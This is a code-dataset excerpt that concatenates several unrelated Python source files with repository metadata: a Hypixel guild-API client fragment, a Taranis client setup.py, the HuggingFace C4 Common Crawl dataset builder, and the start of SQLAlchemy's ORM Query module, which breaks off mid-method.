        session: shared aiohttp client session used for all requests.

    Attributes:
        key: the API key passed at construction.
        session: the aiohttp session.
        get_uuid: see Player.get_uuid().
    """

    def __init__(self, key: str, session: aiohttp.ClientSession):
        self.key = key
        self.session = session
        # NOTE(review): this aliases the unbound Player.get_uuid, so calling
        # ``self.get_uuid(username)`` passes ``username`` as Player's first
        # argument — confirm Player.get_uuid is a plain/static helper.
        self.get_uuid = Player.get_uuid

    async def get_guild(self, *, username: str = False, name: str = False, guild_id: str = False):
        """Fetch a guild by player ``username``, guild ``name`` or ``guild_id``.

        Exactly one keyword argument must be supplied. Raises TypeError when
        none is given, and APIError when the API responds with an error.
        """
        if username:
            params = {'key': self.key, 'uuid': self.get_uuid(username)}
        elif name:
            # Bug fix: the original passed ``guild_id`` (always falsy on
            # this branch) as the ``name`` query parameter.
            params = {'key': self.key, 'name': name}
        elif guild_id:
            params = {'key': self.key, 'id': guild_id}
        else:
            raise TypeError('No arguments recieved.')

        # Single request path replaces the three duplicated branches.
        async with self.session.get(
                url='https://api.hypixel.net/guild',
                params=params
        ) as data:
            guild = await data.json()
            if data.status == 200:
                return guild
            # Bug fix: ``guild`` is a plain dict from ``data.json()``, so the
            # failure cause must be read with item access, not ``.cause``.
            raise APIError(f"Cause: {guild.get('cause')}")
3ab688fd7fedd95e77b913c57780870bd1cf76c8 | 540 | py | Python | src/python/models/setup.py | openhisilicon/taranis | 4b852a64a9aba0a6db3e87ed6dc720b0889fb3e4 | [
"BSD-3-Clause"
] | 5 | 2020-07-20T09:24:27.000Z | 2021-11-16T11:07:51.000Z | src/python/models/setup.py | openhisilicon/taranis | 4b852a64a9aba0a6db3e87ed6dc720b0889fb3e4 | [
"BSD-3-Clause"
] | 1 | 2021-06-02T00:44:47.000Z | 2021-06-02T00:44:47.000Z | src/python/models/setup.py | openhisilicon/taranis | 4b852a64a9aba0a6db3e87ed6dc720b0889fb3e4 | [
"BSD-3-Clause"
] | 1 | 2021-06-17T06:24:13.000Z | 2021-06-17T06:24:13.000Z | # coding: utf-8
"""
Taranis Client
"""
from setuptools import setup # noqa: H301
# Distribution metadata for the Taranis gRPC client package.
NAME = "taranis-cli"
VERSION = "0.2.3"
# Runtime dependencies: the generated stubs need grpcio and its codegen tools.
REQUIRES = ["grpcio==1.21.1", "grpcio-tools==1.21.1"]
setup(
    name=NAME,
    version=VERSION,
    description="Taranis client",
    author="Pierre Letessier",
    author_email="",
    url="https://github.com/pletessier/taranis",
    keywords=["lib", "taranis", "client"],
    install_requires=REQUIRES,
    packages=["."],
    include_package_data=True,
    long_description="""\
Taranis client
"""
)
| 19.285714 | 53 | 0.62963 |
c9a6c5a7db6f0cdb245f980eba3536c0cb8bbff7 | 13,622 | py | Python | venv/lib/python3.6/site-packages/nlp/datasets/c4/8f34fcecc5ffb5e83c649d6dff3a6079f6312e65b5a26587c9c3e27b3b741c87/c4.py | MachineLearningBCAM/minimax-risk-classifier | 82586c632268c103de269bcbffa5f7849b174a29 | [
"MIT"
] | 2 | 2021-09-28T01:36:21.000Z | 2021-12-22T08:24:17.000Z | venv/lib/python3.6/site-packages/nlp/datasets/c4/8f34fcecc5ffb5e83c649d6dff3a6079f6312e65b5a26587c9c3e27b3b741c87/c4.py | MachineLearningBCAM/minimax-risk-classifier | 82586c632268c103de269bcbffa5f7849b174a29 | [
"MIT"
] | null | null | null | venv/lib/python3.6/site-packages/nlp/datasets/c4/8f34fcecc5ffb5e83c649d6dff3a6079f6312e65b5a26587c9c3e27b3b741c87/c4.py | MachineLearningBCAM/minimax-risk-classifier | 82586c632268c103de269bcbffa5f7849b174a29 | [
"MIT"
] | 1 | 2020-12-08T10:36:30.000Z | 2020-12-08T10:36:30.000Z | # coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace NLP Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""C4 dataset based on Common Crawl."""
from __future__ import absolute_import, division, print_function
import json
import logging
import os
import apache_beam as beam
import nlp
from .c4_utils import (
dedupe_urls,
filter_by_webtextlike,
get_clean_page_fn,
get_counter_inc_fn,
get_hashed_url_filter_fn,
is_language,
is_realnews_domain,
is_valid_length,
normalize_url,
remove_duplicate_text,
split_wet_file,
)
_DESCRIPTION = """\
A colossal, cleaned version of Common Crawl's web crawl corpus.
Based on Common Crawl dataset: "https://commoncrawl.org"
Due to the overhead of cleaning the dataset, it is recommend you prepare it with
a distributed service like Cloud Dataflow. More info at
https://www.tensorflow.org/datasets/beam_datasets.
"""
_CITATION = """
@article{2019t5,
author = {Colin Raffel and Noam Shazeer and Adam Roberts and Katherine Lee and Sharan Narang and Michael Matena and Yanqi Zhou and Wei Li and Peter J. Liu},
title = {Exploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer},
journal = {arXiv e-prints},
year = {2019},
archivePrefix = {arXiv},
eprint = {1910.10683},
}
"""
_VERSION = nlp.Version("2.3.0", "Deduplicate lines within a page.")
_SUPPORTED_VERSIONS = [
nlp.Version("2.2.1", "Update dataset_info.json"),
nlp.Version("2.2.0"),
]
_DOWNLOAD_HOST = "https://commoncrawl.s3.amazonaws.com"
_WET_PATH_URL = "https://commoncrawl.s3.amazonaws.com/crawl-data/CC-MAIN-{cc_version}/wet.paths.gz"
_REALNEWS_DOMAINS_URL = "https://raw.githubusercontent.com/rowanz/grover/38f7184bd87237ae2d3bc330b99f1e2e246f6d51/realnews/domain_to_allowed_subdomains.json"
_BADWORDS_URL = "https://raw.githubusercontent.com/LDNOOBW/List-of-Dirty-Naughty-Obscene-and-Otherwise-Bad-Words/25e679f03d96baa721cde20db9944649e8d0a844/{lang}"
_CHECKSUMS_URL = "https://storage.googleapis.com/tfds-data/manual_checksums/c4.txt"
_OPENWEBTEXT_URLS_ZIP = "OpenWebText.zip"
_OPENWEBTEXT_URLS_URL = "https://mega.nz/#F!EZZD0YwJ!9_PlEQzdMVLaNdKv_ICNVQ"
_OPENWEBTEXT_URLS_FILE_PATTERN = "OpenWebText/Version 1/URLs/*.txt"
_DEFAULT_CC_VERSIONS = ("2019-18",) # April 2019
_DEFAULT_WEBTEXTLIKE_CC_VERSIONS = ( # August 2018 - July 2019
"2018-34",
"2018-39",
"2018-43",
"2018-47",
"2018-51",
"2019-04",
"2019-09",
"2019-13",
"2019-18",
"2019-22",
"2019-26",
"2019-30",
)
class C4Config(nlp.BuilderConfig):
    """BuilderConfig for C4 dataset."""

    def __init__(self, language, cc_versions=None, clean=True, realnewslike=False, webtextlike=False, **kwargs):
        """BuilderConfig for C4.

        Args:
          language: string, the language code, or "all" to disable language
            filtering.
          cc_versions: tuple(string), a collection of versions of Common Crawl
            to use as the raw source text. Set to None to use defaults.
          clean: bool, whether to clean the dataset for badwords, duplications,
            etc.
          realnewslike: bool, whether to limit to news domains as compiled by
            RealNews.
          webtextlike: bool, whether to limit to WebText-like URLs.
          **kwargs: keyword arguments forwarded to super.
        """
        # Config name encodes the language plus any non-default options.
        parts = [language]
        if cc_versions:
            parts.append("_".join(cc_versions))
        for enabled, tag in ((not clean, "noclean"),
                             (realnewslike, "realnewslike"),
                             (webtextlike, "webtextlike")):
            if enabled:
                parts.append(tag)
        super().__init__(
            name=".".join(parts),
            version=_VERSION,
            supported_versions=_SUPPORTED_VERSIONS,
            **kwargs,
        )
        self.lang = language
        if cc_versions:
            self.cc_versions = cc_versions
        else:
            # WebText-like needs the wider August 2018 - July 2019 range.
            self.cc_versions = _DEFAULT_WEBTEXTLIKE_CC_VERSIONS if webtextlike else _DEFAULT_CC_VERSIONS
        self.clean = clean
        self.realnewslike = realnewslike
        self.webtextlike = webtextlike
class C4(nlp.BeamBasedBuilder):
    """C4 dataset based on Common Crawl."""
    # Shown to users when required files must be fetched by hand.
    MANUAL_DOWNLOAD_INSTRUCTIONS = """\
  For the WebText-like config, you must manually download 'OpenWebText.zip'
  (from https://mega.nz/#F!EZZD0YwJ!9_PlEQzdMVLaNdKv_ICNVQ) and the Common Crawl
  WET files from August 2018 to July 2019
  (https://commoncrawl.org/the-data/get-started/) and place them in the
  `manual_dir`.
  """
    # Four English variants: default, uncleaned, RealNews-restricted, and
    # OpenWebText-URL-restricted.
    BUILDER_CONFIGS = [
        C4Config(language="en", description="English C4 dataset."),
        C4Config(
            language="en",
            clean=False,
            description="Disables all cleaning (deduplication, removal based on bad words, " "etc.)",
        ),
        C4Config(
            language="en",
            realnewslike=True,
            description="Filters from the default config to only include content from the "
            "domains used in the 'RealNews' dataset (Zellers et al., 2019).",
        ),
        C4Config(
            language="en",
            webtextlike=True,
            description="Filters from the default config to only include content from the "
            "URLs in OpenWebText (https://github.com/jcpeterson/openwebtext).",
        ),
    ]
    def _info(self):
        """Return the DatasetInfo (features, citation, homepage) for C4."""
        features = {
            "text": nlp.Value("string"),
            "url": nlp.Value("string"),
        }
        # Versions after 1.0.0 also expose the raw HTTP metadata fields.
        if self.version > "1.0.0":
            features.update(
                {
                    "content-type": nlp.Value("string"),
                    "content-length": nlp.Value("string"),
                    "timestamp": nlp.Value("string"),
                }
            )
        return nlp.DatasetInfo(
            description=_DESCRIPTION,
            features=nlp.Features(features),
            citation=_CITATION,
            homepage="https://github.com/google-research/text-to-text-transfer-transformer#datasets",
        )
    def _split_generators(self, dl_manager, pipeline):
        """Download/locate the WET inputs and define the train/validation splits."""
        dl_manager.download_checksums(_CHECKSUMS_URL)
        # We will automatically download the default CC version(s), but others
        # need to be manually downloaded.
        cc_versions = set(self.config.cc_versions)
        auto_cc_versions = cc_versions & set(_DEFAULT_CC_VERSIONS)
        manual_cc_versions = cc_versions - set(_DEFAULT_CC_VERSIONS)
        files_to_download = {}
        files_to_download["wet_path_urls"] = [
            _WET_PATH_URL.format(cc_version=cc_version) for cc_version in auto_cc_versions
        ]
        if self.config.clean:
            files_to_download["badwords"] = _BADWORDS_URL.format(lang=self.config.lang)
        if self.config.realnewslike:
            files_to_download["realnews_domains"] = _REALNEWS_DOMAINS_URL
        file_paths = dl_manager.download_and_extract(files_to_download)
        # The WebText-like config additionally needs the manually supplied
        # OpenWebText URL archive.
        if self.config.webtextlike:
            owt_path = os.path.join(dl_manager.manual_dir, _OPENWEBTEXT_URLS_ZIP)
            if not os.path.exists(owt_path):
                raise FileNotFoundError(
                    "{} does not exist. Make sure you insert a manual dir via `nlp.load('c4', data_dir=...)` that includes a file name {}. Manual download instructions: {})".format(
                        owt_path, _OPENWEBTEXT_URLS_ZIP, self.MANUAL_DOWNLOAD_INSTRUCTIONS
                    )
                )
            file_paths["openwebtext_urls_zip"] = dl_manager.extract(owt_path)
        # Expand each downloaded wet.paths file into full WET download URLs.
        wet_urls = []
        for wet_path_url in file_paths["wet_path_urls"]:
            with open(wet_path_url, "r") as f:
                wet_urls.extend(["%s/%s" % (_DOWNLOAD_HOST, l.strip()) for l in f])
        file_paths["wet_urls"] = wet_urls
        file_paths["wet_files"] = []
        # Non-default CC versions must already exist under manual_dir.
        for cc_version in manual_cc_versions:
            cc_dir = os.path.join(dl_manager.manual_dir, cc_version)
            wet_files = beam.io.filesystems.FileSystems.match(os.path.join(cc_dir, "*.warc.wet.gz"))
            if not os.path.exists(cc_dir):
                raise FileNotFoundError(
                    "{} does not exist. Make sure you insert a manual dir via `nlp.load('c4', data_dir=...)` that includes the files {}. Manual download instructions: {})".format(
                        cc_dir, "*.warc.wet.gz", self.MANUAL_DOWNLOAD_INSTRUCTIONS
                    )
                )
            logging.info("Adding %d WET files for manually downloaded version %s.", len(wet_files), cc_version)
            file_paths["wet_files"].extend(wet_files)
        page_content_pcollection = self._get_page_content(pipeline, file_paths, dl_manager)
        # Split on a hash of the URL: 1 in 1000 pages go to validation.
        return [
            nlp.SplitGenerator(
                name=nlp.Split.TRAIN,
                gen_kwargs=dict(
                    split="train",
                    page_content=page_content_pcollection,
                    hashed_url_predicate=lambda x: x % 1000 != 0,  # 99.9%
                ),
            ),
            nlp.SplitGenerator(
                name=nlp.Split.VALIDATION,
                gen_kwargs=dict(
                    split="validation",
                    page_content=page_content_pcollection,
                    hashed_url_predicate=lambda x: x % 1000 == 0,  # 0.1%
                ),
            ),
        ]
    def _get_page_content(self, pipeline, file_paths, dl_manager):
        """Build PCollection of un-split page content.

        :param pipeline: the root Beam pipeline object.
        :param file_paths: dict of downloaded/extracted artifact paths;
            always contains "wet_files", optionally "wet_urls",
            "realnews_domains", "openwebtext_urls_zip" and "badwords"
            depending on the builder config.
        :param dl_manager: download manager, used to fetch WET files from
            within the pipeline when "wet_urls" is present.
        :return: a PCollection of deduplicated, optionally filtered and
            cleaned page-content records keyed by normalized URL.
        """
        wet_file_paths = pipeline | "create_wet_files" >> beam.Create(file_paths["wet_files"])
        if "wet_urls" in file_paths:
            # Fetch remaining WET files from inside the pipeline; when the
            # pipeline runs remotely, ship the downloaded files with it.
            def download_url(url, downloader, pipeline):
                path = downloader.download(url)
                if not pipeline.is_local():
                    path = downloader.ship_files_with_pipeline(path, pipeline)
                return path
            dl_wet_file_paths = (
                pipeline
                | "create_wet_urls" >> beam.Create(file_paths["wet_urls"])
                | beam.Map(download_url, downloader=dl_manager, pipeline=pipeline)
            )
            wet_file_paths = (wet_file_paths, dl_wet_file_paths) | beam.Flatten()
        # Parse WET files and filter by length.
        # Output: url, text
        page_content = wet_file_paths | beam.FlatMap(split_wet_file) | beam.Filter(is_valid_length)
        # Optionally filter for RealNews domains.
        # Output: url, text
        if self.config.realnewslike:
            with open(file_paths["realnews_domains"], "r") as f:
                realnews_domains = json.load(f)
            page_content = page_content | beam.Filter(is_realnews_domain, realnews_domains)
        # Normalize and deduplicate by URL.
        # Output: url, text
        page_content = (
            page_content
            | "normalize_url" >> beam.Map(normalize_url)
            | "group_url" >> beam.GroupByKey()
            | beam.Map(dedupe_urls)
        )
        # Optionally filter for WebText-like URLs.
        # Output: url, text
        if self.config.webtextlike:
            # Join pages against the OpenWebText URL list via CoGroupByKey;
            # the dummy empty page lets the URL list share the (url, text)
            # shape expected by normalize_url.
            webtextlike_urls = (
                pipeline
                | "read_webtextlike_urls"
                >> beam.io.ReadFromText(
                    os.path.join(file_paths["openwebtext_urls_zip"], _OPENWEBTEXT_URLS_FILE_PATTERN)
                )
                | "add_dummy_page" >> beam.Map(lambda x: (x, ""))
                | "normal_webtext_url" >> beam.Map(normalize_url)
            )
            page_content = (
                {"text": page_content, "webtextlike_urls": webtextlike_urls}
                | "group_webtextlike_urls" >> beam.CoGroupByKey()
                | beam.FlatMap(filter_by_webtextlike)
            )
        # Optionally clean pages of badwords, boilerplate text, and duplicate
        # spans of sentences.
        # Output: url, text
        if self.config.clean:
            with open(file_paths["badwords"], "r") as f:
                badwords = [l.strip() for l in f]
            page_content = page_content | "clean_pages" >> beam.FlatMap(get_clean_page_fn(badwords))
            page_content = remove_duplicate_text(page_content)
        # Optionally filter out non-`language` pages. We do this after cleaning
        # since it may change the predominant language.
        if self.config.lang != "all":
            page_content |= beam.Filter(is_language, language=self.config.lang)
        return page_content
def _build_pcollection(self, unused_pipeline, split, page_content, hashed_url_predicate):
def _emit_examples(el):
get_counter_inc_fn(split)("examples")
_, features = el
return (
features["url"],
{
"url": features["url"],
"text": features["text"],
"content-type": features["content-type"],
"content-length": features["content-length"],
"timestamp": features["timestamp"],
},
)
return page_content | beam.Filter(get_hashed_url_filter_fn(hashed_url_predicate)) | beam.Map(_emit_examples)
| 39.947214 | 181 | 0.62355 |
7e7c93527bba9d2d99de7d499ed3ce8ae26bffda | 161,748 | py | Python | lib/sqlalchemy/orm/query.py | leamingrad/sqlalchemy | 56fb68ca8620a211ca29b3d47d649dfa332d354a | [
"MIT"
] | null | null | null | lib/sqlalchemy/orm/query.py | leamingrad/sqlalchemy | 56fb68ca8620a211ca29b3d47d649dfa332d354a | [
"MIT"
] | null | null | null | lib/sqlalchemy/orm/query.py | leamingrad/sqlalchemy | 56fb68ca8620a211ca29b3d47d649dfa332d354a | [
"MIT"
] | null | null | null | # orm/query.py
# Copyright (C) 2005-2018 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""The Query class and support.
Defines the :class:`.Query` class, the central
construct used by the ORM to construct database queries.
The :class:`.Query` class should not be confused with the
:class:`.Select` class, which defines database
SELECT operations at the SQL (non-ORM) level. ``Query`` differs from
``Select`` in that it returns ORM-mapped objects and interacts with an
ORM session, whereas the ``Select`` construct interacts directly with the
database to return iterable result sets.
"""
from itertools import chain
from . import (
attributes, interfaces, object_mapper, persistence,
exc as orm_exc, loading
)
from .base import _entity_descriptor, _is_aliased_class, \
_is_mapped_class, _orm_columns, _generative, InspectionAttr
from .path_registry import PathRegistry
from .util import (
AliasedClass, ORMAdapter, join as orm_join, with_parent, aliased,
_entity_corresponds_to
)
from .. import sql, util, log, exc as sa_exc, inspect, inspection
from ..sql.expression import _interpret_as_from
from ..sql import (
util as sql_util,
expression, visitors
)
from ..sql.base import ColumnCollection
from . import properties
__all__ = ['Query', 'QueryContext', 'aliased']
# Shared root path registry; serves as the class-level default for
# Query._current_path below.
_path_registry = PathRegistry.root
@inspection._self_inspects
@log.class_logger
class Query(object):
"""ORM-level SQL construction object.
:class:`.Query` is the source of all SELECT statements generated by the
ORM, both those formulated by end-user query operations as well as by
high level internal operations such as related collection loading. It
features a generative interface whereby successive calls return a new
:class:`.Query` object, a copy of the former with additional
criteria and options associated with it.
:class:`.Query` objects are normally initially generated using the
:meth:`~.Session.query` method of :class:`.Session`, and in
less common cases by instantiating the :class:`.Query` directly and
associating with a :class:`.Session` using the :meth:`.Query.with_session`
method.
For a full walkthrough of :class:`.Query` usage, see the
:ref:`ormtutorial_toplevel`.
"""
_only_return_tuples = False
_enable_eagerloads = True
_enable_assertions = True
_with_labels = False
_criterion = None
_yield_per = None
_order_by = False
_group_by = False
_having = None
_distinct = False
_prefixes = None
_suffixes = None
_offset = None
_limit = None
_for_update_arg = None
_statement = None
_correlate = frozenset()
_populate_existing = False
_invoke_all_eagers = True
_version_check = False
_autoflush = True
_only_load_props = None
_refresh_state = None
_refresh_identity_token = None
_from_obj = ()
_join_entities = ()
_select_from_entity = None
_mapper_adapter_map = {}
_filter_aliases = None
_from_obj_alias = None
_joinpath = _joinpoint = util.immutabledict()
_execution_options = util.immutabledict()
_params = util.immutabledict()
_attributes = util.immutabledict()
_with_options = ()
_with_hints = ()
_enable_single_crit = True
_orm_only_adapt = True
_orm_only_from_obj_alias = True
_current_path = _path_registry
_has_mapper_entities = False
lazy_loaded_from = None
"""An :class:`.InstanceState` that is using this :class:`.Query` for a
lazy load operation.
This can be used for extensions like the horizontal sharding extension
as well as event handlers and custom mapper options to determine
when a query is being used to lazy load a relationship on an object.
.. versionadded:: 1.2.9
"""
def __init__(self, entities, session=None):
"""Construct a :class:`.Query` directly.
E.g.::
q = Query([User, Address], session=some_session)
The above is equivalent to::
q = some_session.query(User, Address)
:param entities: a sequence of entities and/or SQL expressions.
:param session: a :class:`.Session` with which the :class:`.Query`
will be associated. Optional; a :class:`.Query` can be associated
with a :class:`.Session` generatively via the
:meth:`.Query.with_session` method as well.
.. seealso::
:meth:`.Session.query`
:meth:`.Query.with_session`
"""
self.session = session
self._polymorphic_adapters = {}
self._set_entities(entities)
def _set_entities(self, entities, entity_wrapper=None):
if entity_wrapper is None:
entity_wrapper = _QueryEntity
self._entities = []
self._primary_entity = None
self._has_mapper_entities = False
# 1. don't run util.to_list() or _set_entity_selectables
# if no entities were passed - major performance bottleneck
# from lazy loader implementation when it seeks to use Query
# class for an identity lookup, causes test_orm.py to fail
# with thousands of extra function calls, see issue #4228
# for why this use had to be added
# 2. can't use classmethod on Query because session.query_cls
# is an arbitrary callable in some user recipes, not
# necessarily a class, so we don't have the class available.
# see issue #4256
# 3. can't do "if entities is not None" because we usually get here
# from session.query() which takes in *entities.
# 4. can't do "if entities" because users make use of undocumented
# to_list() behavior here and they pass clause expressions that
# can't be evaluated as boolean. See issue #4269.
# 5. the empty tuple is a singleton in cPython, take advantage of this
# so that we can skip for the empty "*entities" case without using
# any Python overloadable operators.
#
if entities is not ():
for ent in util.to_list(entities):
entity_wrapper(self, ent)
self._set_entity_selectables(self._entities)
    def _set_entity_selectables(self, entities):
        """Supply each query entity with its (ext_info, aliased_adapter)
        pair, caching the pair per entity in ``self._mapper_adapter_map``."""
        # copy-on-write so generative clones don't share mutations
        self._mapper_adapter_map = d = self._mapper_adapter_map.copy()
        for ent in entities:
            for entity in ent.entities:
                if entity not in d:
                    ext_info = inspect(entity)
                    if not ext_info.is_aliased_class and \
                            ext_info.mapper.with_polymorphic:
                        # non-aliased entity mapped with_polymorphic:
                        # register a polymorphic adapter for its mapped
                        # table, once per table.
                        if ext_info.mapper.mapped_table not in \
                                self._polymorphic_adapters:
                            self._mapper_loads_polymorphically_with(
                                ext_info.mapper,
                                sql_util.ColumnAdapter(
                                    ext_info.selectable,
                                    ext_info.mapper._equivalent_columns
                                )
                            )
                        aliased_adapter = None
                    elif ext_info.is_aliased_class:
                        aliased_adapter = ext_info._adapter
                    else:
                        aliased_adapter = None
                    d[entity] = (
                        ext_info,
                        aliased_adapter
                    )
                ent.setup_entity(*d[entity])
def _mapper_loads_polymorphically_with(self, mapper, adapter):
for m2 in mapper._with_polymorphic_mappers or [mapper]:
self._polymorphic_adapters[m2] = adapter
for m in m2.iterate_to_root():
self._polymorphic_adapters[m.local_table] = adapter
    def _set_select_from(self, obj, set_base_alias):
        """Establish this Query's FROM list from ``obj``.

        :param obj: sequence of mapped entities, aliased constructs and/or
            selectables.
        :param set_base_alias: when True, additionally set up
            ``self._from_obj_alias`` so that subsequent criteria are adapted
            to the single FROM element.
        """
        fa = []
        select_from_alias = None
        for from_obj in obj:
            info = inspect(from_obj)
            if hasattr(info, 'mapper') and \
                    (info.is_mapper or info.is_aliased_class):
                self._select_from_entity = info
                if set_base_alias and not info.is_aliased_class:
                    raise sa_exc.ArgumentError(
                        "A selectable (FromClause) instance is "
                        "expected when the base alias is being set.")
                fa.append(info.selectable)
            elif not info.is_selectable:
                raise sa_exc.ArgumentError(
                    "argument is not a mapped class, mapper, "
                    "aliased(), or FromClause instance.")
            else:
                # plain SELECT statements must be aliased to act as a FROM
                if isinstance(from_obj, expression.SelectBase):
                    from_obj = from_obj.alias()
                if set_base_alias:
                    select_from_alias = from_obj
                fa.append(from_obj)
        self._from_obj = tuple(fa)
        # NOTE(review): the elif branch below reads ``info`` left over from
        # the final loop iteration; it is only reachable when the loop ran
        # (len(self._from_obj) == 1), but confirm this reliance is intended.
        if set_base_alias and \
                len(self._from_obj) == 1 and \
                isinstance(select_from_alias, expression.Alias):
            equivs = self.__all_equivs()
            self._from_obj_alias = sql_util.ColumnAdapter(
                self._from_obj[0], equivs)
        elif set_base_alias and \
                len(self._from_obj) == 1 and \
                hasattr(info, "mapper") and \
                info.is_aliased_class:
            self._from_obj_alias = info._adapter
def _reset_polymorphic_adapter(self, mapper):
for m2 in mapper._with_polymorphic_mappers:
self._polymorphic_adapters.pop(m2, None)
for m in m2.iterate_to_root():
self._polymorphic_adapters.pop(m.local_table, None)
def _adapt_polymorphic_element(self, element):
if "parententity" in element._annotations:
search = element._annotations['parententity']
alias = self._polymorphic_adapters.get(search, None)
if alias:
return alias.adapt_clause(element)
if isinstance(element, expression.FromClause):
search = element
elif hasattr(element, 'table'):
search = element.table
else:
return None
alias = self._polymorphic_adapters.get(search, None)
if alias:
return alias.adapt_clause(element)
def _adapt_col_list(self, cols):
return [
self._adapt_clause(
expression._literal_as_label_reference(o),
True, True)
for o in cols
]
    @_generative()
    def _set_lazyload_from(self, state):
        """Generative: mark this query as lazy loading on behalf of the
        given :class:`.InstanceState` (see :attr:`.Query.lazy_loaded_from`)."""
        self.lazy_loaded_from = state
    @_generative()
    def _adapt_all_clauses(self):
        """Generative: adapt *all* incoming clause elements, not only those
        tagged as ORM constructs (see :meth:`._adapt_clause`)."""
        self._orm_only_adapt = False
    def _adapt_clause(self, clause, as_filter, orm_only):
        """Adapt incoming clauses to transformations which
        have been applied within this query.

        :param clause: the ClauseElement to adapt.
        :param as_filter: if True, additionally apply any filter aliases
            currently in effect.
        :param orm_only: if True, only adapt elements carrying ORM
            annotations; forced False when ``_orm_only_adapt`` is disabled.
        """
        adapters = []
        # do we adapt all expression elements or only those
        # tagged as 'ORM' constructs ?
        if not self._orm_only_adapt:
            orm_only = False
        if as_filter and self._filter_aliases:
            for fa in self._filter_aliases._visitor_iterator:
                adapters.append(
                    (
                        orm_only, fa.replace
                    )
                )
        if self._from_obj_alias:
            # for the "from obj" alias, apply extra rule to the
            # 'ORM only' check, if this query were generated from a
            # subquery of itself, i.e. _from_selectable(), apply adaption
            # to all SQL constructs.
            adapters.append(
                (
                    orm_only if self._orm_only_from_obj_alias else False,
                    self._from_obj_alias.replace
                )
            )
        if self._polymorphic_adapters:
            adapters.append(
                (
                    orm_only, self._adapt_polymorphic_element
                )
            )
        if not adapters:
            # no transformations in effect; return the clause unchanged
            return clause
        def replace(elem):
            # first adapter producing a non-None replacement wins
            for _orm_only, adapter in adapters:
                # if 'orm only', look for ORM annotations
                # in the element before adapting.
                if not _orm_only or \
                        '_orm_adapt' in elem._annotations or \
                        "parententity" in elem._annotations:
                    e = adapter(elem)
                    if e is not None:
                        return e
        return visitors.replacement_traverse(
            clause,
            {},
            replace
        )
    def _query_entity_zero(self):
        """Return the first QueryEntity (IndexError if no entities)."""
        return self._entities[0]
    def _mapper_zero(self):
        """Return the Mapper associated with the first QueryEntity."""
        return self._entities[0].mapper
def _entity_zero(self):
"""Return the 'entity' (mapper or AliasedClass) associated
with the first QueryEntity, or alternatively the 'select from'
entity if specified."""
return self._select_from_entity \
if self._select_from_entity is not None \
else self._query_entity_zero().entity_zero
    @property
    def _mapper_entities(self):
        """Iterate the subset of ``self._entities`` which are
        _MapperEntity instances."""
        for ent in self._entities:
            if isinstance(ent, _MapperEntity):
                yield ent
def _joinpoint_zero(self):
return self._joinpoint.get(
'_joinpoint_entity',
self._entity_zero()
)
def _bind_mapper(self):
ezero = self._entity_zero()
if ezero is not None:
insp = inspect(ezero)
if not insp.is_clause_element:
return insp.mapper
return None
    def _only_full_mapper_zero(self, methname):
        """Return the sole primary entity, raising InvalidRequestError
        (naming ``methname``) if this Query is composed of anything other
        than a single full mapped class."""
        if self._entities != [self._primary_entity]:
            raise sa_exc.InvalidRequestError(
                "%s() can only be used against "
                "a single mapped class." % methname)
        return self._primary_entity.entity_zero
    def _only_entity_zero(self, rationale=None):
        """Return the zero entity, raising InvalidRequestError (with the
        optional ``rationale`` message) if more than one entity is present."""
        if len(self._entities) > 1:
            raise sa_exc.InvalidRequestError(
                rationale or
                "This operation requires a Query "
                "against a single mapper."
            )
        return self._entity_zero()
def __all_equivs(self):
equivs = {}
for ent in self._mapper_entities:
equivs.update(ent.mapper._equivalent_columns)
return equivs
    def _get_condition(self):
        """Assert no criterion is present, then reset criterion state;
        used on behalf of get()."""
        return self._no_criterion_condition(
            "get", order_by=False, distinct=False)
    def _get_existing_condition(self):
        """Assert (without resetting any state) that no criterion is
        present, on behalf of an identity-map hit in get()."""
        self._no_criterion_assertion("get", order_by=False, distinct=False)
    def _no_criterion_assertion(self, meth, order_by=True, distinct=True):
        """Raise InvalidRequestError (naming ``meth``) if criterion, a full
        statement, FROM objects, LIMIT/OFFSET, GROUP BY - and optionally
        ORDER BY or DISTINCT - are already configured on this Query."""
        if not self._enable_assertions:
            return
        if self._criterion is not None or \
                self._statement is not None or self._from_obj or \
                self._limit is not None or self._offset is not None or \
                self._group_by or (order_by and self._order_by) or \
                (distinct and self._distinct):
            raise sa_exc.InvalidRequestError(
                "Query.%s() being called on a "
                "Query with existing criterion. " % meth)
def _no_criterion_condition(self, meth, order_by=True, distinct=True):
self._no_criterion_assertion(meth, order_by, distinct)
self._from_obj = ()
self._statement = self._criterion = None
self._order_by = self._group_by = self._distinct = False
    def _no_clauseelement_condition(self, meth):
        """Raise if an ORDER BY is present, then assert and reset all other
        criterion state; used e.g. by :meth:`.with_polymorphic`."""
        if not self._enable_assertions:
            return
        if self._order_by:
            raise sa_exc.InvalidRequestError(
                "Query.%s() being called on a "
                "Query with existing criterion. " % meth)
        self._no_criterion_condition(meth)
    def _no_statement_condition(self, meth):
        """Raise if a complete statement has already been set on this
        Query, which precludes applying further criterion via ``meth``."""
        if not self._enable_assertions:
            return
        if self._statement is not None:
            raise sa_exc.InvalidRequestError(
                ("Query.%s() being called on a Query with an existing full "
                 "statement - can't apply criterion.") % meth)
def _no_limit_offset(self, meth):
if not self._enable_assertions:
return
if self._limit is not None or self._offset is not None:
raise sa_exc.InvalidRequestError(
"Query.%s() being called on a Query which already has LIMIT "
"or OFFSET applied. To modify the row-limited results of a "
" Query, call from_self() first. "
"Otherwise, call %s() before limit() or offset() "
"are applied."
% (meth, meth)
)
    def _get_options(self, populate_existing=None,
                     version_check=None,
                     only_load_props=None,
                     refresh_state=None,
                     identity_token=None):
        """Set load/refresh options on this Query in place (non-generative);
        each flag is applied only when truthy.  Returns ``self``."""
        if populate_existing:
            self._populate_existing = populate_existing
        if version_check:
            self._version_check = version_check
        if refresh_state:
            self._refresh_state = refresh_state
        if only_load_props:
            self._only_load_props = set(only_load_props)
        if identity_token:
            self._refresh_identity_token = identity_token
        return self
def _clone(self):
cls = self.__class__
q = cls.__new__(cls)
